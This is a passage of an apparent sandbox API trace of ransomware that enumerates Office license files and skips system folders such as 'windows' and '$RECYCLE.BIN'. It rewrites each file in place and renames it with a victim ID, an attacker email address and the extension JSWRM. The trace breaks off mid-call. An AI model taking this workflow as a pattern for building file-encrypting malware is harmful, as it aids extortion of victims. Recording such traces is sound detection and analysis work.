[0111.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b5d8 [0111.270] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.271] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11651) returned 1 [0111.271] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0111.271] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0111.279] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.279] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0111.279] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.279] CloseHandle (hObject=0x45c) returned 1 [0111.279] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0111.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0111.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0111.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0111.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0111.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0111.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0111.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0111.280] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProDemoR_BypassTrial180-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprodemor_bypasstrial180-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0111.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0111.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b5d8 | out: hHeap=0x1e0000) returned 1 [0111.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.282] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebbfd7eb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebbfd7eb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebcbc3cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProMSDNR_Retail-pl.xrm-ms", cAlternateFileName="VI3679~1.XRM")) returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="recovery") returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.282] lstrcmpiW (lpString1="VisioProMSDNR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0111.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0111.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0111.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProMSDNR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0111.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0111.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0111.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0111.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0111.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241178, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProMSDNR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0111.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0111.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0111.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0111.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.283] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10655) returned 1 [0111.283] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.283] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0111.283] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0111.292] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.292] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0111.292] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.292] CloseHandle (hObject=0x45c) returned 1 [0111.292] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0111.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0111.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0111.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0111.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0111.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0111.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.293] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0111.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0111.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0111.294] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.294] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebd0885a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebd0885a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebded68f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x51bb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProMSDNR_Retail-ppd.xrm-ms", cAlternateFileName="VI22C9~1.XRM")) returned 1 [0111.294] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2=".") returned 1 [0111.294] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="..") returned 1 [0111.294] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="...") returned 1 [0111.294] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="windows") returned -1 [0111.294] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="recovery") returned 1 [0111.294] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="perflogs") returned 1 [0111.295] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0111.295] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.295] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="system volume information") returned 1 [0111.295] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ppd.xrm-ms", lpString2="msocache") returned 1 [0111.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0111.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0111.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x2411c8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProMSDNR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0111.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0111.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0111.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240fc0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProMSDNR_Retail-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0111.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0111.295] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0111.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.295] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.296] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20923) returned 1 [0111.296] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x51b0) returned 0x24c1d0 [0111.296] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x51b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x51b0, lpOverlapped=0x0) returned 1 [0111.308] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.308] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x51b0, lpOverlapped=0x0) returned 1 [0111.308] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.308] CloseHandle (hObject=0x45c) returned 1 [0111.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0111.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0111.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0111.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0111.309] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0111.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0111.309] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.309] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProMSDNR_Retail-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visiopromsdnr_retail-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0111.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0111.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0111.310] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0111.311] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xebc9614d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xebc9614d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xebd54d20, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d52, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProMSDNR_Retail-ul-oob.xrm-ms", cAlternateFileName="VIC97F~1.XRM")) returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.311] lstrcmpiW (lpString1="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0111.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0111.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22ce70, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProMSDNR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0111.311] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0111.311] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c2d0 [0111.311] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0111.311] RtlAllocateHeap 